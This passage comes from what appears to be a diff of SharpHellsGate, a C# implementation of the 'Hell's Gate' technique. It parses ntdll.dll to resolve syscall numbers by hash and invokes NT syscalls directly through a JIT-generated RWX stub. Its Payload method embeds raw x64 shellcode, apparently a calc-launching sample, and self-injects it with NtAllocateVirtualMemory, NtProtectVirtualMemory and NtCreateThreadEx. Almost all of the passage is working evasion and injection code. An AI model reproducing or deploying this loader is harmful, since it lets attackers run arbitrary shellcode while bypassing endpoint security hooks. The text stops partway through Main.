return Func(ref hThread, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer);
|
||||
}
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtWaitForSingleObject native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="ObjectHandle">Open handle to a alertable executive object.</param>
|
||||
/// <param name="Alertable">If set, calling thread is signaled, so all queued APC routines are executed.</param>
|
||||
/// <param name="TimeOuts">Time-out interval, in microseconds. NULL means infinite.</param>
|
||||
/// <returns>NtWaitForSingleObject returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
private UInt32 NtWaitForSingleObject(IntPtr ObjectHandle, bool Alertable, ref Structures.LARGE_INTEGER TimeOuts) {
|
||||
lock (this.Mutant) {
|
||||
Int16 syscall = this.APITable[Util.NtWaitForSingleObjectHash].Syscall;
|
||||
if (syscall == 0x0000)
|
||||
return Macros.STATUS_UNSUCCESSFUL;
|
||||
|
||||
DFunctions.NtWaitForSingleObject Func = NtInvocation<DFunctions.NtWaitForSingleObject>(syscall);
|
||||
return Func(ObjectHandle, Alertable, ref TimeOuts);
|
||||
}
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// .ctor
|
||||
/// </summary>
|
||||
/// <param name="Table">The API table that will be used by the multiple function wrapers.</param>
|
||||
public HellsGate(Dictionary<UInt64, Util.APITableEntry> Table) {
|
||||
this.APITable = Table;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// JIT a static method to generate RWX memory segment.
|
||||
/// </summary>
|
||||
/// <returns>Whether the memory segment was successfully generated.</returns>
|
||||
public bool GenerateRWXMemorySegment() {
|
||||
// Find and JIT the method
|
||||
MethodInfo method = typeof(HellsGate).GetMethod(nameof(Gate), BindingFlags.Static | BindingFlags.NonPublic);
|
||||
if (method == null) {
|
||||
Util.LogError("Unable to find the method");
|
||||
return false;
|
||||
}
|
||||
RuntimeHelpers.PrepareMethod(method.MethodHandle);
|
||||
|
||||
// Get the address of the function and check if first opcode == JMP
|
||||
IntPtr pMethod = method.MethodHandle.GetFunctionPointer();
|
||||
if (Marshal.ReadByte(pMethod) != 0xe9) {
|
||||
Util.LogError("Method was not JIT'ed or invalid stub");
|
||||
return false;
|
||||
}
|
||||
Util.LogInfo($"Managed method address: 0x{pMethod:x16}");
|
||||
|
||||
// Get address of jited method and stack alignment
|
||||
Int32 offset = Marshal.ReadInt32(pMethod, 1);
|
||||
UInt64 addr = (UInt64)pMethod + (UInt64)offset;
|
||||
while (addr % 16 != 0)
|
||||
addr++;
|
||||
Util.LogInfo($"Unmanaged method address: 0x{addr:x16}\n");
|
||||
|
||||
this.MangedMethodAddress = method.MethodHandle.GetFunctionPointer();
|
||||
this.UnmanagedMethodAddress = (IntPtr)addr;
|
||||
this.IsGateReady = true;
|
||||
return true;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Payload example. In this case this is a basic shellcode self-injection.
|
||||
/// </summary>
|
||||
public void Payload() {
|
||||
if (!this.IsGateReady) {
|
||||
if (!this.GenerateRWXMemorySegment()) {
|
||||
Util.LogError("Unable to generate RX memory segment");
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
byte[] shellcode = new byte[273] {
|
||||
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
|
||||
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
|
||||
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
|
||||
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
|
||||
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
|
||||
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
|
||||
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
|
||||
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
|
||||
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
|
||||
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
|
||||
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
|
||||
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
|
||||
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
|
||||
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
|
||||
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
|
||||
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
|
||||
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
|
||||
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
|
||||
0x63,0x00,0xc3
|
||||
};
|
||||
Util.LogInfo($"Shellcode size: {shellcode.Length} bytes");
|
||||
|
||||
// Allocate Memory
|
||||
IntPtr pBaseAddres = IntPtr.Zero;
|
||||
IntPtr Region = (IntPtr)shellcode.Length;
|
||||
UInt32 ntstatus = NtAllocateVirtualMemory(Macros.GetCurrentProcess(), ref pBaseAddres, IntPtr.Zero, ref Region, Macros.MEM_COMMIT | Macros.MEM_RESERVE, Macros.PAGE_READWRITE);
|
||||
if (!Macros.NT_SUCCESS(ntstatus)) {
|
||||
Util.LogError($"Error ntdll!NtAllocateVirtualMemory (0x{ntstatus:0x8})");
|
||||
return;
|
||||
}
|
||||
Util.LogInfo($"Page address: 0x{pBaseAddres:x16}");
|
||||
|
||||
// Copy Memory
|
||||
Marshal.Copy(shellcode, 0, pBaseAddres, shellcode.Length);
|
||||
Array.Clear(shellcode, 0, shellcode.Length);
|
||||
|
||||
// Change memory protection
|
||||
UInt32 OldAccessProtection = 0;
|
||||
ntstatus = NtProtectVirtualMemory(Macros.GetCurrentProcess(), ref pBaseAddres, ref Region, Macros.PAGE_EXECUTE_READ, ref OldAccessProtection);
|
||||
if (!Macros.NT_SUCCESS(ntstatus) || OldAccessProtection != 0x0004) {
|
||||
Util.LogError($"Error ntdll!NtProtectVirtualMemory (0x{ntstatus:0x8})");
|
||||
return;
|
||||
}
|
||||
|
||||
IntPtr hThread = IntPtr.Zero;
|
||||
ntstatus = NtCreateThreadEx(ref hThread, 0x1FFFFF, IntPtr.Zero, Macros.GetCurrentProcess(), pBaseAddres, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
|
||||
if (!Macros.NT_SUCCESS(ntstatus) || hThread == IntPtr.Zero) {
|
||||
Util.LogError($"Error ntdll!NtCreateThreadEx (0x{ntstatus:0x8})");
|
||||
return;
|
||||
}
|
||||
Util.LogInfo($"Thread handle: 0x{hThread:x16}\n");
|
||||
|
||||
// Wait for one second
|
||||
Structures.LARGE_INTEGER TimeOut = new Structures.LARGE_INTEGER();
|
||||
TimeOut.QuadPart = -10000000;
|
||||
ntstatus = NtWaitForSingleObject(hThread, false, ref TimeOut);
|
||||
if (ntstatus != 0x00) {
|
||||
Util.LogError($"Error ntdll!NtWaitForSingleObject (0x{ntstatus:0x8})");
|
||||
return;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,142 @@
|
|||
using System;
|
||||
using System.IO;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
|
||||
namespace SharpHellsGate.Module {
|
||||
/// <summary>
|
||||
/// Used to manipulate and extract information from a memory stream.
|
||||
/// In this case the memory stream is the NTDLL module.
|
||||
/// </summary>
|
||||
public class MemoryUtil : IDisposable {
|
||||
|
||||
/// <summary>
|
||||
/// The memory stream representation of the NTDLL module.
|
||||
/// </summary>
|
||||
protected Stream ModuleStream { get; set; }
|
||||
|
||||
/// <summary>
|
||||
/// Dispose the memory stream when no longer needed.
|
||||
/// </summary>
|
||||
~MemoryUtil() => Dispose();
|
||||
|
||||
/// <summary>
|
||||
/// Dispose the memory stream when no longer needed.
|
||||
/// </summary>
|
||||
public void Dispose() {
|
||||
this.ModuleStream.Dispose();
|
||||
this.ModuleStream.Close();
|
||||
GC.SuppressFinalize(this);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract a structure from the memory stream.
|
||||
/// </summary>
|
||||
/// <typeparam name="T">The Type of the structure to extract.</typeparam>
|
||||
/// <param name="offset">The offset in the memory stream where the structure is located.</param>
|
||||
/// <returns>The structure populated or the default structure.</returns>
|
||||
protected T GetStructureFromBlob<T>(Int64 offset) where T : struct {
|
||||
Span<byte> bytes = this.GetStructureBytesFromOffset<T>(offset);
|
||||
if (Marshal.SizeOf<T>() != bytes.Length)
|
||||
return default;
|
||||
|
||||
IntPtr ptr = Marshal.AllocHGlobal(Marshal.SizeOf<T>());
|
||||
Marshal.Copy(bytes.ToArray(), 0, ptr, bytes.Length);
|
||||
T s = Marshal.PtrToStructure<T>(ptr);
|
||||
|
||||
Marshal.FreeHGlobal(ptr);
|
||||
return s;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract the code from a native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="offset">The location of the function in the memory stream.</param>
|
||||
/// <returns>The 24 bytes representing the code of the function.</returns>
|
||||
protected Span<byte> GetFunctionOpCode(Int64 offset) {
|
||||
Span<byte> s = stackalloc byte[24];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return s.ToArray();
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract a DWORD value from the memory stream.
|
||||
/// </summary>
|
||||
/// <param name="offset">The location of the DWORD in the memory stream.</param>
|
||||
/// <returns>The value of the DWORD.</returns>
|
||||
protected UInt32 ReadPtr32(Int64 offset) {
|
||||
Span<byte> s = stackalloc byte[4];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return BitConverter.ToUInt32(s);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract a QWORD value from the memory stream.
|
||||
/// </summary>
|
||||
/// <param name="offset">The location of the QWORD in the memory stream.</param>
|
||||
/// <returns>The value of the QWORD.</returns>
|
||||
protected UInt64 ReadPtr64(Int64 offset) {
|
||||
Span<byte> s = stackalloc byte[8];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return BitConverter.ToUInt64(s);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract a WORD value from the memory stream.
|
||||
/// </summary>
|
||||
/// <param name="offset">The location of the WORD in the memory stream.</param>
|
||||
/// <returns>The value of the WORD.</returns>
|
||||
protected UInt16 ReadUShort(Int64 offset) {
|
||||
Span<byte> s = stackalloc byte[2];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return BitConverter.ToUInt16(s);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract an ASCII string from the memory stream.
|
||||
/// </summary>
|
||||
/// <param name="offset">The location of the ASCII string in the memory stream.</param>
|
||||
/// <returns>The ASCII string.</returns>
|
||||
protected string ReadAscii(Int64 offset) {
|
||||
int length = 0;
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
while (this.ModuleStream.ReadByte() != 0x00)
|
||||
length++;
|
||||
|
||||
Span<byte> s = length <= 1024 ? stackalloc byte[length] : new byte[length];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return Encoding.ASCII.GetString(s);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Extract the byte representation of a structure from the memory stream.
|
||||
/// </summary>
|
||||
/// <typeparam name="T">The Type of the structure to extract from the memory stream.</typeparam>
|
||||
/// <param name="offset">The location of the structure in the memory stream.</param>
|
||||
/// <returns>The structure as byte span.</returns>
|
||||
protected Span<byte> GetStructureBytesFromOffset<T>(Int64 offset) where T : struct {
|
||||
Span<byte> s = stackalloc byte[Marshal.SizeOf<T>()];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return s.ToArray();
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get a specific amount of bytes at a specific location in the memory stream.
|
||||
/// </summary>
|
||||
/// <param name="offset">The location of the bytes to extract from the memory stream.</param>
|
||||
/// <param name="size">The number of bytes to extract from the memory stream at a give location.</param>
|
||||
/// <returns>The desired bytes as a byte span.</returns>
|
||||
protected Span<byte> GetBytesFromOffset(Int64 offset, int size) {
|
||||
Span<byte> s = size >= 1024 ? new byte[size] : stackalloc byte[size];
|
||||
this.ModuleStream.Seek(offset, SeekOrigin.Begin);
|
||||
this.ModuleStream.Read(s);
|
||||
return s.ToArray();
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,328 @@
|
|||
using System;
|
||||
using System.IO;
|
||||
using SharpHellsGate.Win32;
|
||||
using System.Collections.Generic;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Linq;
|
||||
|
||||
namespace SharpHellsGate.Module {
|
||||
|
||||
/// <summary>
|
||||
/// Wrapper around the NTDLL module.
|
||||
/// Used to extract structures and find system calls.
|
||||
/// </summary>
|
||||
public class SystemModule : MemoryUtil {
|
||||
|
||||
/// <summary>
|
||||
/// IMAGE_DOS_HEADER structure of the NTDLL module.
|
||||
/// </summary>
|
||||
public Structures.IMAGE_DOS_HEADER ModuleDOSHeader { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// IMAGE_NT_HEADERS64 structure of the NTDLL module.
|
||||
/// </summary>
|
||||
public Structures.IMAGE_NT_HEADERS64 ModuleNTHeaders { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// IMAGE_SECTION_HEADER structure from the NTDLL module.
|
||||
/// </summary>
|
||||
public List<Structures.IMAGE_SECTION_HEADER> ModuleSectionHeaders { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// IMAGE_EXPORT_DIRECTORY structure from the NTDLL module.
|
||||
/// </summary>
|
||||
public Structures.IMAGE_EXPORT_DIRECTORY ModuleExportDirectory { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Location in the memory stream of the IMAGE_EXPORT_DIRECTORY structure.
|
||||
/// </summary>
|
||||
public Int64 ModuleExportDirectoryOffset { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Location in the memory stream of the exported functions' name.
|
||||
/// </summary>
|
||||
public Int64 ModuleExportDirectoryAddressNamesOffset { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Location in the memory stream of the exported functions' address.
|
||||
/// </summary>
|
||||
public Int64 ModuleExportDirectoryAddressFunctionsOffset { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Location in the memory stream of the exported functions' ordinal.
|
||||
/// </summary>
|
||||
public Int64 ModuleExportDirectoryAddressNameOrdinalesOffset { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Name of the module. Will be NTDLL.
|
||||
/// </summary>
|
||||
public string ModuleName { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// Path of the module. Will be %WINDIR%\System32\ntdll.dll
|
||||
/// </summary>
|
||||
public string ModulePath { get; private set; }
|
||||
|
||||
/// <summary>
|
||||
/// .ctor
|
||||
/// </summary>
|
||||
/// <param name="name">Name of the module</param>
|
||||
public SystemModule(string name) : base() {
|
||||
this.ModuleName = name;
|
||||
this.ModulePath = $"{Environment.SystemDirectory}\\{name}";
|
||||
this.ModuleSectionHeaders = new List<Structures.IMAGE_SECTION_HEADER>() { };
|
||||
|
||||
this.LoadModule();
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Load the module into a memory stream.
|
||||
/// </summary>
|
||||
/// <returns>Whether the loading process was a success.</returns>
|
||||
public bool LoadModule() {
|
||||
if (string.IsNullOrEmpty(this.ModuleName)) {
|
||||
Util.LogError("Module name not provided");
|
||||
return false;
|
||||
}
|
||||
|
||||
if (!File.Exists(this.ModulePath)) {
|
||||
Util.LogError($"Unable to find module: {this.ModuleName}");
|
||||
return false;
|
||||
}
|
||||
|
||||
ReadOnlySpan<byte> ModuleBlob = File.ReadAllBytes(this.ModulePath);
|
||||
if (ModuleBlob.Length == 0x00) {
|
||||
Util.LogError($"Empty module content: {this.ModuleName}");
|
||||
return false;
|
||||
}
|
||||
|
||||
base.ModuleStream = new MemoryStream(ModuleBlob.ToArray());
|
||||
return true;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Reload all structures.
|
||||
/// </summary>
|
||||
/// <returns>Whether all structures were successfully reloaded.</returns>
|
||||
public bool LoadAllStructures() {
|
||||
if (this.GetModuleDOSHeader(true).Equals(default(Structures.IMAGE_DOS_HEADER)))
|
||||
return false;
|
||||
|
||||
if (this.GetModuleNTHeaders(true).Equals(default(Structures.IMAGE_NT_HEADERS64)))
|
||||
return false;
|
||||
|
||||
if (this.GetModuleSectionHeaders(true).Count != this.ModuleNTHeaders.FileHeader.NumberOfSections)
|
||||
return false;
|
||||
|
||||
if (this.GetModuleExportDirectory(true).Equals(default(Structures.IMAGE_EXPORT_DIRECTORY)))
|
||||
return false;
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the _IMAGE_DOS_HEADERstructure from the module.
|
||||
/// </summary>
|
||||
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||
/// <returns>The IMAGE_NT_HEADERS64 structure of the module.</returns>
|
||||
public Structures.IMAGE_DOS_HEADER GetModuleDOSHeader(bool ReloadCache = false) {
|
||||
if (!this.ModuleDOSHeader.Equals(default(Structures.IMAGE_DOS_HEADER)) && !ReloadCache)
|
||||
return this.ModuleDOSHeader;
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
this.ModuleDOSHeader = base.GetStructureFromBlob<Structures.IMAGE_DOS_HEADER>(0);
|
||||
if (this.ModuleDOSHeader.e_magic != Macros.IMAGE_DOS_SIGNATURE) {
|
||||
Util.LogError("Invalid DOS header signature");
|
||||
return default;
|
||||
}
|
||||
|
||||
return this.ModuleDOSHeader;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the IMAGE_NT_HEADERS64 structure from the module.
|
||||
/// </summary>
|
||||
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||
/// <returns>The IMAGE_NT_HEADERS64 structure of the module.</returns>
|
||||
public Structures.IMAGE_NT_HEADERS64 GetModuleNTHeaders(bool ReloadCache = false) {
|
||||
if (!this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)) && !ReloadCache)
|
||||
return this.ModuleNTHeaders;
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (this.ModuleDOSHeader.Equals(default(Structures.IMAGE_DOS_HEADER)))
|
||||
this.GetModuleDOSHeader();
|
||||
|
||||
this.ModuleNTHeaders = base.GetStructureFromBlob<Structures.IMAGE_NT_HEADERS64>(this.ModuleDOSHeader.e_lfanew);
|
||||
if (this.ModuleNTHeaders.Signature != Macros.IMAGE_NT_SIGNATURE) {
|
||||
Util.LogError("Invalid NT headers signature");
|
||||
return default;
|
||||
}
|
||||
|
||||
return this.ModuleNTHeaders;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get list of _IMAGE_SECTION_HEADER structures from the module.
|
||||
/// </summary>
|
||||
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||
/// <returns>The list of _IMAGE_SECTION_HEADER structures.</returns>
|
||||
public List<Structures.IMAGE_SECTION_HEADER> GetModuleSectionHeaders(bool ReloadCache = false) {
|
||||
if (this.ModuleSectionHeaders.Count == this.ModuleNTHeaders.FileHeader.NumberOfSections && !ReloadCache)
|
||||
return this.ModuleSectionHeaders;
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)) || this.ModuleNTHeaders.FileHeader.Equals(default(Structures.IMAGE_FILE_HEADER)))
|
||||
this.GetModuleNTHeaders();
|
||||
|
||||
for (Int16 cx = 0; cx < this.ModuleNTHeaders.FileHeader.NumberOfSections; cx++) {
|
||||
Int64 iSectionOffset = this.GetModuleSectionOffset(cx);
|
||||
|
||||
Structures.IMAGE_SECTION_HEADER ImageSection = base.GetStructureFromBlob<Structures.IMAGE_SECTION_HEADER>(iSectionOffset);
|
||||
if (!ImageSection.Equals(default(Structures.IMAGE_SECTION_HEADER)))
|
||||
this.ModuleSectionHeaders.Add(ImageSection);
|
||||
}
|
||||
|
||||
return this.ModuleSectionHeaders;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get a _IMAGE_SECTION_HEADER structure by name.
|
||||
/// </summary>
|
||||
/// <param name="name">The name of the section.</param>
|
||||
/// <returns>The _IMAGE_SECTION_HEADER structure if exists.</returns>
|
||||
public Structures.IMAGE_SECTION_HEADER GetModuleSectionHeaderByName(string name) {
|
||||
if (name.Length > 8) {
|
||||
Util.LogError("Invalid section name");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (this.ModuleSectionHeaders.Count == 0x00)
|
||||
this.GetModuleSectionHeaders();
|
||||
|
||||
return this.ModuleSectionHeaders.Where(x => x.Name.Equals(name, StringComparison.OrdinalIgnoreCase)).FirstOrDefault();
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the Export Address Table (aka EAT) from the module.
|
||||
/// </summary>
|
||||
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||
/// <returns>the _IMAGE_EXPORT_DIRECTORY structure</returns>
|
||||
public Structures.IMAGE_EXPORT_DIRECTORY GetModuleExportDirectory(bool ReloadCache = false) {
|
||||
if (!this.ModuleExportDirectory.Equals(default(Structures.IMAGE_EXPORT_DIRECTORY)) && !ReloadCache)
|
||||
return this.ModuleExportDirectory;
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
if (this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)))
|
||||
this.GetModuleNTHeaders();
|
||||
|
||||
if (this.ModuleSectionHeaders.Count == 0x00)
|
||||
this.GetModuleSectionHeaders();
|
||||
|
||||
this.ModuleExportDirectoryOffset = this.ConvertRvaToOffset(this.ModuleNTHeaders.OptionalHeader.DataDirectory[0].VirtualAddress);
|
||||
this.ModuleExportDirectory = base.GetStructureFromBlob<Structures.IMAGE_EXPORT_DIRECTORY>(this.ModuleExportDirectoryOffset);
|
||||
if (this.ModuleExportDirectory.Equals(default(Structures.IMAGE_EXPORT_DIRECTORY))) {
|
||||
Util.LogError("Invalid export address table (EAT).");
|
||||
return default;
|
||||
}
|
||||
|
||||
// Parse all functions
|
||||
this.ModuleExportDirectoryAddressNamesOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfNames);
|
||||
this.ModuleExportDirectoryAddressFunctionsOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfFunctions);
|
||||
this.ModuleExportDirectoryAddressNameOrdinalesOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfNameOrdinals);
|
||||
return this.ModuleExportDirectory;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the address, name, system call for a given function hash.
|
||||
/// </summary>
|
||||
/// <param name="FunctionHash">DJB2 function hash.</param>
|
||||
/// <returns></returns>
|
||||
public Util.APITableEntry GetAPITableEntry(UInt64 FunctionHash) {
|
||||
if (this.ModuleExportDirectoryAddressNamesOffset == 0x00 || this.ModuleExportDirectoryAddressFunctionsOffset == 0x00|| this.ModuleExportDirectoryAddressNameOrdinalesOffset == 0x00)
|
||||
this.GetModuleExportDirectory();
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
Util.APITableEntry Entry = new Util.APITableEntry {
|
||||
Hash = FunctionHash
|
||||
};
|
||||
|
||||
for (Int32 cx = 0; cx < this.ModuleExportDirectory.NumberOfNames; cx++) {
|
||||
UInt32 PtrFunctionName = base.ReadPtr32(this.ModuleExportDirectoryAddressNamesOffset + (sizeof(uint) * cx));
|
||||
string FunctionName = base.ReadAscii(this.ConvertRvaToOffset(PtrFunctionName));
|
||||
|
||||
if (FunctionHash == Util.GetFunctionDJB2Hash(FunctionName)) {
|
||||
UInt32 PtrFunctionAdddress = base.ReadPtr32(this.ModuleExportDirectoryAddressFunctionsOffset + (sizeof(uint) * (cx + 1)));
|
||||
Span<byte> opcode = base.GetFunctionOpCode(this.ConvertRvaToOffset(PtrFunctionAdddress));
|
||||
|
||||
if (opcode[3] == 0xb8 && opcode[18] == 0x0f && opcode[19] == 0x05) {
|
||||
Entry.Name = FunctionName;
|
||||
Entry.Address = PtrFunctionAdddress;
|
||||
Entry.Syscall = (Int16)(((byte)opcode[5] << 4) | (byte)opcode[4]);
|
||||
return Entry;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return default;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the offset of a _IMAGE_SECTION_HEADER structure.
|
||||
/// </summary>
|
||||
/// <param name="cx">The section to get.</param>
|
||||
/// <returns>The _IMAGE_SECTION_HEADER structure.</returns>
|
||||
private Int64 GetModuleSectionOffset(Int16 cx)
|
||||
=> this.ModuleDOSHeader.e_lfanew
|
||||
+ Marshal.SizeOf<Structures.IMAGE_FILE_HEADER>()
|
||||
+ this.ModuleNTHeaders.FileHeader.SizeOfOptionalHeader
|
||||
+ sizeof(Int32) // sizeof(DWORD)
|
||||
+ (Marshal.SizeOf<Structures.IMAGE_SECTION_HEADER>() * cx);
|
||||
|
||||
/// <summary>
|
||||
/// Convert a relative virtual address (RVA) into an offset.
|
||||
/// </summary>
|
||||
/// <param name="rva">The RVA to convert into an offset in the iamge.</param>
|
||||
/// <param name="SectionHeader">The section in which the relative virtual address (RVA) points to.</param>
|
||||
/// <returns>The offset.</returns>
|
||||
private Int64 ConvertRvaToOffset(Int64 rva, Structures.IMAGE_SECTION_HEADER SectionHeader) => rva - SectionHeader.VirtualAddress + SectionHeader.PointerToRawData;
|
||||
|
||||
/// <summary>
|
||||
/// Convert a relative virtual address (RVA) into an offset.
|
||||
/// </summary>
|
||||
/// <param name="rva">The RVA to convert into an offset in the iamge.</param>
|
||||
/// <returns>The offset.</returns>
|
||||
private Int64 ConvertRvaToOffset(Int64 rva) => this.ConvertRvaToOffset(rva, GetSectionByRVA(rva));
|
||||
|
||||
/// <summary>
|
||||
/// Get which image section is which a relative virtual address (RVA) points to.
|
||||
/// </summary>
|
||||
/// <param name="rva">The RVA</param>
|
||||
/// <returns>The _IMAGE_SECTION_HEADER structure</returns>
|
||||
private Structures.IMAGE_SECTION_HEADER GetSectionByRVA(Int64 rva) => this.ModuleSectionHeaders.Where(x => rva > x.VirtualAddress && rva <= x.VirtualAddress + x.SizeOfRawData).First();
|
||||
}
|
||||
}
|
|
@ -0,0 +1,51 @@
|
|||
using System;
|
||||
using System.Collections.Generic;
|
||||
using SharpHellsGate.Module;
|
||||
|
||||
namespace SharpHellsGate {
|
||||
|
||||
/// <summary>
|
||||
/// Main class.
|
||||
/// </summary>
|
||||
public class Program {
|
||||
|
||||
/// <summary>
|
||||
/// Entry point of the program.
|
||||
/// </summary>
|
||||
/// <param name="args">Command line arguments.</param>
|
||||
static void Main(string[] args) {
|
||||
Util.LogInfo("Copyright (C) 2020 Paul Laine (@am0nsec)");
|
||||
Util.LogInfo("C# Implementation of the Hell's Gate VX Technique");
|
||||
Util.LogInfo(" --------------------------------------------------\n", 0, "");
|
||||
|
||||
// Only works for x86
|
||||
if (IntPtr.Size != 8) {
|
||||
Util.LogError("Project only tested in x64 context.\n");
|
||||
return;
|
||||
}
|
||||
|
||||
// Load the module and get everything ready
|
||||
SystemModule ntdll = new SystemModule("ntdll.dll");
|
||||
ntdll.LoadAllStructures();
|
||||
|
||||
// Resolve all the system calls
|
||||
